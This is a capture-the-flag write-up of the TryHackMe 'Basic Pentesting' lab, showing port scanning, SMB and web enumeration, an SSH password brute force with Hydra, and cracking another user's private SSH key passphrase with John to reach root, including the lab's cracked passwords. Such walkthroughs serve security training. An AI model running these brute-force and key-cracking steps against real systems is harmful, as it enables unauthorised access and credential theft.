Basic pentesting

This is a machine that allows you to practise web app hacking and privilege escalation

Very basic CTF room from tryHackMe. I have enjoyed the privilege escalation part. Brute forcing is the key point of exploitation here. Hope this write-up will help you to explore.

My target IP changed later, because I had to restart the machine.

Enumeration

1) First, a masscan all port scan: masscan -e eth0 -p 1-65535 -v --rate=10000 10.10.1.239

Discovered open port 22/tcp on 10.10.1.239                                     
Discovered open port 139/tcp on 10.10.1.239                                    
Discovered open port 8009/tcp on 10.10.1.239                                   
Discovered open port 8080/tcp on 10.10.1.239                                   
Discovered open port 80/tcp on 10.10.1.239                                     
Discovered open port 445/tcp on 10.10.1.239 

2) Now doing specific port scan to know more. Using nmap scan: nmap -sV -sC -p 22,139,8009,8080,80,445 -v 10.10.1.239

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/9.0.7

Host script results:
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BASIC2<00>           Flags: <unique><active>
|   BASIC2<03>           Flags: <unique><active>
|   BASIC2<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2021-06-04T09:50:56-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-04 14:50:56
|_  start_date: 1600-12-31 23:58:45

3) enum4linux is a very good tool and I'm using to enumerate further. And it showed me some more info: enum4linux -a -v 10.10.1.239

Sharename       Type      Comment
---------       ----      -------
	Anonymous       Disk      
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
	
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

Here this server is vulnerable: exploit-db

4) Enumerating webpage at port 80

5) As there is a web service, I initiate a Nikto scan: nikto -h http://10.10.254.163

+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3268: /development/: Directory indexing found.
+ OSVDB-3092: /development/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.

6) The interesting directory, /development gives two .txt file.

• dev.txt says, maybe there is REST running and google says, it has vulnerability: exploit-db

• j.txt says, weak password. Maybe I can brute force the password.

Exploitation

7) I was clueless which service to attack. As there are 2 different service vulnerable. I have tried to explore the ssh and used - Hydra to attack ssh: hydra -l jan -P rockyou.txt ssh://10.10.254.163

Found the password: armando

8) Accessing the machine using ssh: ssh jan@10.10.254.163

Privilege Escalation

9) Enumeration says, only /etc/passwd has read permission. So this is not vulnerable.

10) Simple directory navigation show .ssh and private key for kay

11) Copied the id_rsa, saved it using nano and then tried to use the private key. But can not log in just by the private key

12) So I need to find the hash, so using ssh2john: ssh2john.py id_rsa > rsa_hash

13) Need to crack the password again:john --wordlist=rockyou.txt rsa_hash

Password: beeswax

14) Doing ssh again with the password: ssh -i id_rsa kay@10.10.254.163

15) Now I have found a backup with a password hash. I can simply get the root access with the password.

Finally, the root shell !!

Answers